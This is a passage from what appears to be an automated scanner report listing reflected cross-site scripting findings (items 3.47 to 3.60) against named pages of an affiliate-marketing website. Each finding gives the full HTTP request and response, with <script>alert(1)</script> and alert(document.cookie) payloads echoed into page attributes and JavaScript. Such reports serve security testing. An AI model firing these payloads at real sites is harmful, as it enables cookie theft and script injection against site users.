Keep-Alive: 115
Connection: keep-alive

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.aspireaffiliates.com/xmlrpc.php
Date: Mon, 16 May 2011 12:46:21 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<iframe src="https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=d4800\"><script>alert(1)</script>7b893187770" frameborder="0" scrolling="no" height="96" width="950">
...[SNIP]...

3.47. https://www.aspireaffiliates.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aspireaffiliates.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fb220</script><script>alert(1)</script>85bdb6913a5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?fb220</script><script>alert(1)</script>85bdb6913a5=1 HTTP/1.1
Host: www.aspireaffiliates.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:59:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.aspireaffiliates.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
.click(function(){
       $("#brands_ok_more").show("slow");
   $("#brands_popular").css("padding-top","630px");
       
       });
});

function RedirectToUrl(url){
//alert(url);
if (!url.indexOf('?')){url=url+'?fb220</script><script>alert(1)</script>85bdb6913a5=1';}
window.location=url;

}
function goto(gourl){
window.location='/'+gourl+'/?fb220</script>
...[SNIP]...

3.48. https://www.aspireaffiliates.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aspireaffiliates.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0cc2"><script>alert(1)</script>b04df9313ef was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d0cc2\"><script>alert(1)</script>b04df9313ef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?d0cc2"><script>alert(1)</script>b04df9313ef=1 HTTP/1.1
Host: www.aspireaffiliates.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:59:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.aspireaffiliates.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<iframe src="https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx?d0cc2\"><script>alert(1)</script>b04df9313ef=1" frameborder="0" scrolling="no" height="96" width="950">
...[SNIP]...

3.49. https://www.aspireaffiliates.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aspireaffiliates.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a034a"><script>alert(1)</script>761a7e15528 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a034a\"><script>alert(1)</script>761a7e15528 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?a034a"><script>alert(1)</script>761a7e15528=1 HTTP/1.1
Host: www.aspireaffiliates.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:59:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.aspireaffiliates.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<a href="/?a034a\"><script>alert(1)</script>761a7e15528=1" title="Home">
...[SNIP]...

3.50. https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx [CMI parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aspireaffiliates.com
Path:   /WebSite/Affiliates/login.aspx

Issue detail

The value of the CMI request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a43e"><script>alert(1)</script>9fec3b443df was submitted in the CMI parameter. This input was echoed as 3a43e\"><script>alert(1)</script>9fec3b443df in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /WebSite/Affiliates/login.aspx?CMI=13a43e"><script>alert(1)</script>9fec3b443df HTTP/1.1
Host: www.aspireaffiliates.com
Connection: keep-alive
Referer: https://www.aspireaffiliates.com/?CMI=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.aspireaffiliates.com/xmlrpc.php
Date: Mon, 16 May 2011 12:47:13 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<a href="/?CMI=13a43e\"><script>alert(1)</script>9fec3b443df" title="Home">
...[SNIP]...

3.51. https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx [d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aspireaffiliates.com
Path:   /WebSite/Affiliates/login.aspx

Issue detail

The value of the d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2e7f5</script><script>alert(1)</script>51625b9e77d was submitted in the d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /WebSite/Affiliates/login.aspx?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=12e7f5</script><script>alert(1)</script>51625b9e77d HTTP/1.1
Host: www.aspireaffiliates.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.aspireaffiliates.com/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.aspireaffiliates.com/xmlrpc.php
Date: Mon, 16 May 2011 12:46:51 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
ular").css("padding-top","630px");
       
       });
});

function RedirectToUrl(url){
//alert(url);
if (!url.indexOf('?')){url=url+'?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=12e7f5</script><script>alert(1)</script>51625b9e77d';}
window.location=url;

}
function goto(gourl){
window.location='/'+gourl+'/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=12e7f5</script>
...[SNIP]...

3.52. https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx [d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aspireaffiliates.com
Path:   /WebSite/Affiliates/login.aspx

Issue detail

The value of the d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 907ef"><script>alert(1)</script>9ba8bab1929 was submitted in the d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter. This input was echoed as 907ef\"><script>alert(1)</script>9ba8bab1929 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /WebSite/Affiliates/login.aspx?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=907ef"><script>alert(1)</script>9ba8bab1929 HTTP/1.1
Host: www.aspireaffiliates.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.aspireaffiliates.com/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.aspireaffiliates.com/xmlrpc.php
Date: Mon, 16 May 2011 12:46:33 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<iframe src="https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=907ef\"><script>alert(1)</script>9ba8bab1929" frameborder="0" scrolling="no" height="96" width="950">
...[SNIP]...

3.53. https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx [d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aspireaffiliates.com
Path:   /WebSite/Affiliates/login.aspx

Issue detail

The value of the d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bdd01"><script>alert(1)</script>7c3cf6160b7 was submitted in the d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter. This input was echoed as bdd01\"><script>alert(1)</script>7c3cf6160b7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /WebSite/Affiliates/login.aspx?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1bdd01"><script>alert(1)</script>7c3cf6160b7 HTTP/1.1
Host: www.aspireaffiliates.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.aspireaffiliates.com/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.aspireaffiliates.com/xmlrpc.php
Date: Mon, 16 May 2011 12:46:28 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<a href="/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1bdd01\"><script>alert(1)</script>7c3cf6160b7" title="Home">
...[SNIP]...

3.54. https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aspireaffiliates.com
Path:   /WebSite/Affiliates/login.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e175"><script>alert(1)</script>d02fb3e546d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8e175\"><script>alert(1)</script>d02fb3e546d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /WebSite/Affiliates/login.aspx?d0cc2\&8e175"><script>alert(1)</script>d02fb3e546d=1 HTTP/1.1
Host: www.aspireaffiliates.com
Connection: keep-alive
Referer: https://www.aspireaffiliates.com/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.aspireaffiliates.com/xmlrpc.php
Date: Mon, 16 May 2011 12:46:29 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<a href="/?d0cc2\\&8e175\"><script>alert(1)</script>d02fb3e546d=1" title="Home">
...[SNIP]...

3.55. https://www.aspireaffiliates.com/marketing-samples/ [d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aspireaffiliates.com
Path:   /marketing-samples/

Issue detail

The value of the d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3533"><script>alert(1)</script>c87eee535a4 was submitted in the d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter. This input was echoed as b3533\"><script>alert(1)</script>c87eee535a4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /marketing-samples/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1b3533"><script>alert(1)</script>c87eee535a4 HTTP/1.1
Host: www.aspireaffiliates.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.aspireaffiliates.com/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.aspireaffiliates.com/xmlrpc.php
Date: Mon, 16 May 2011 12:46:22 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<a href="/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1b3533\"><script>alert(1)</script>c87eee535a4" title="Home">
...[SNIP]...

3.56. https://www.aspireaffiliates.com/marketing-samples/ [d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aspireaffiliates.com
Path:   /marketing-samples/

Issue detail

The value of the d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1d3a"><script>alert(1)</script>cdc0ff990ea was submitted in the d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter. This input was echoed as e1d3a\"><script>alert(1)</script>cdc0ff990ea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /marketing-samples/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=e1d3a"><script>alert(1)</script>cdc0ff990ea HTTP/1.1
Host: www.aspireaffiliates.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.aspireaffiliates.com/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.aspireaffiliates.com/xmlrpc.php
Date: Mon, 16 May 2011 12:46:29 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<iframe src="https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=e1d3a\"><script>alert(1)</script>cdc0ff990ea" frameborder="0" scrolling="no" height="96" width="950">
...[SNIP]...

3.57. https://www.aspireaffiliates.com/marketing-samples/ [d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aspireaffiliates.com
Path:   /marketing-samples/

Issue detail

The value of the d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 33f4f</script><script>alert(1)</script>059ba1b89e was submitted in the d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /marketing-samples/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=133f4f</script><script>alert(1)</script>059ba1b89e HTTP/1.1
Host: www.aspireaffiliates.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.aspireaffiliates.com/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.aspireaffiliates.com/xmlrpc.php
Date: Mon, 16 May 2011 12:46:47 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
ular").css("padding-top","630px");
       
       });
});

function RedirectToUrl(url){
//alert(url);
if (!url.indexOf('?')){url=url+'?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=133f4f</script><script>alert(1)</script>059ba1b89e';}
window.location=url;

}
function goto(gourl){
window.location='/'+gourl+'/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=133f4f</script>
...[SNIP]...

3.58. https://www.aspireaffiliates.com/marketing-samples/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aspireaffiliates.com
Path:   /marketing-samples/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79420"><script>alert(1)</script>acb62a6df93 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 79420\"><script>alert(1)</script>acb62a6df93 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /marketing-samples/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1&79420"><script>alert(1)</script>acb62a6df93=1 HTTP/1.1
Host: www.aspireaffiliates.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.aspireaffiliates.com/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.aspireaffiliates.com/xmlrpc.php
Date: Mon, 16 May 2011 12:46:53 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<iframe src="https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1&79420\"><script>alert(1)</script>acb62a6df93=1" frameborder="0" scrolling="no" height="96" width="950">
...[SNIP]...

3.59. https://www.aspireaffiliates.com/marketing-samples/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aspireaffiliates.com
Path:   /marketing-samples/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 42ccb</script><script>alert(1)</script>48b926f12c9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /marketing-samples/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1&42ccb</script><script>alert(1)</script>48b926f12c9=1 HTTP/1.1
Host: www.aspireaffiliates.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.aspireaffiliates.com/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.aspireaffiliates.com/xmlrpc.php
Date: Mon, 16 May 2011 12:47:11 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
lar").css("padding-top","630px");
       
       });
});

function RedirectToUrl(url){
//alert(url);
if (!url.indexOf('?')){url=url+'?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1&42ccb</script><script>alert(1)</script>48b926f12c9=1';}
window.location=url;

}
function goto(gourl){
window.location='/'+gourl+'/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1&42ccb</script>
...[SNIP]...

3.60. https://www.aspireaffiliates.com/marketing-samples/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aspireaffiliates.com
Path:   /marketing-samples/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 931f9"><script>alert(1)</script>426411977a5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 931f9\"><script>alert(1)</script>426411977a5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /marketing-samples/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1&931f9"><script>alert(1)</script>426411977a5=1 HTTP/1.1
Host: www.aspireaffiliates.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.aspireaffiliates.com/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1

Response

